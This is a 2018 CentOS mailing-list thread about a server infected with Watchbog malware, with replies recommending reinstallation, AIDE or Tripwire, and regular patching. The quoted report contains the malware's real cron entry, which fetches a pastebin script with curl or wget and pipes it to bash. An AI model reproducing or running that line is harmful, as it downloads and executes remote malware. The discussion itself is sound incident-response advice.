[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mon Dec 17 22:20:26 UTC 2018
peter.winterflood <peter.winterflood at ossi.co.uk>



On 17 December 2018 9:58:03 p.m. "Pete Biggs" <pete at biggs.org.uk> wrote:

>> Is there a way to find out how the CentOS 7.5 Linux box got infected with
>> malware?
>> Currently i am referring to
>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>> to carry out the below steps and is done manually.
>>
>> 1)rm -fr /tmp/*timesyncc.service*
>> 2)crontab -e -u apigee
>> delete the cron entry
>> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>> 3)ps aux | grep watchbog
>> kill -9 pidof watchbog
>>
>> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
>> infected with Watchbog Malware.
>
> Well, if the infected crontab is owned by user 'apigee' then it would
> suggest that whatever runs as that user is the source of the infection.
> The malware appears to try to elevate its privs, and if it's successful
> it modifies various system files.  What you are seeing in the 'apigee'
> crontab is just the tip of the iceberg.
>
> It is unlikely that what is in that blog will successfully get rid of
> all the malware - it will probably stop it running, but your system
> will still have the malware on it and it may have left other backdoors
> into your system.
>
> The *ONLY* way of being sure your system is clean is to wipe and
> reinstall. (And make sure that if you restore from backup, that the
> backup is clean.)
>
>> Is there any open source software which can
>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>>
> Yes, lots, although most centre around detecting the intrusion rather
> than preventing it - the classic way of detecting intrusions in the
> past has been Tripwire, but it's a long time since I used it and there
> are no doubt better things around. Search for "linux intrusion
> detection tools".
>
> For prevention, by far the best way is to keep your system and
> application software up to date.  The intrusions work by elevating
> privilege to root, and that elevation requires either a knowledge of
> passwords/keys or the ability to leverage vulnerabilities. The first is
> mitigated by strong passwords and proper security housekeeping; the
> second by regularly updating your system especially with security
> updates.
>
> P.
>
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos
AIDE is the closest equiv to tripwire on centos.
regards peter

Sent with AquaMail for Android
https://www.mobisystems.com/aqua-mail